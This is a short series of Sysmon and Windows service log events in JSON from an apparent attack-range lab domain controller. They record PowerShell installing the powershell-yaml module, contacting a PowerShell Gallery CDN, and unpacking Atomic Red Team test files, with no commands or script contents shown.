{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4681,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:26.733\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:26.733","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:26.733","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:26.733","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4682,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:26.733\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 05:52:26.733","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:26.733","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 05:52:26.733","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4683,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:24.833\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54948\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:24.833","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54948","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4684,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:25.139\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54949\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:25.139","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54949","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4685,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:27.280\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awhw133j.gun.ps1\r\nCreationUtcTime: 2020-08-01 05:52:27.280","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:27.280","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awhw133j.gun.ps1","CreationUtcTime":"2020-08-01 05:52:27.280","EventReceivedTime":"2020-08-01 05:52:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4686,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:26.480\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nQueryName: psg-prod-eastus.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 psg-prod-eastus.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:26.480","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","QueryName":"psg-prod-eastus.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 psg-prod-eastus.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4687,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:25.716\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54951\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:25.716","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54951","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4688,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:25.993\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54952\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:25.993","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54952","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4689,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:26.488\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54953\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:26.488","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54953","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76855,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Windows Insider Service service entered the stopped state.","param1":"Windows Insider Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:52:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4690,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:31.296\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:31.296","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:31.296","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:31.296","EventReceivedTime":"2020-08-01 05:52:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4691,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:31.312\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:31.312","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:31.312","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:31.312","EventReceivedTime":"2020-08-01 05:52:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4692,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:31.312\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:31.312","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:31.312","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:31.312","EventReceivedTime":"2020-08-01 05:52:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4693,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:31.312\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 05:52:31.312","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:31.312","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 05:52:31.312","EventReceivedTime":"2020-08-01 05:52:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4694,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:31.312\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 05:52:31.312","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:31.312","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 05:52:31.312","EventReceivedTime":"2020-08-01 05:52:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:32","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4695,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:32.984\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\atomic-hello.exe\r\nCreationUtcTime: 2020-08-01 05:52:32.984","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:32.984","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\atomic-hello.exe","CreationUtcTime":"2020-08-01 05:52:32.984","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4696,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:32.999\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Argonaut.ps1\r\nCreationUtcTime: 2020-08-01 05:52:32.999","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:32.999","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Argonaut.ps1","CreationUtcTime":"2020-08-01 05:52:32.999","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4697,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:32.999\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Cyclotron.bat\r\nCreationUtcTime: 2020-08-01 05:52:32.999","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:32.999","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Cyclotron.bat","CreationUtcTime":"2020-08-01 05:52:32.999","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
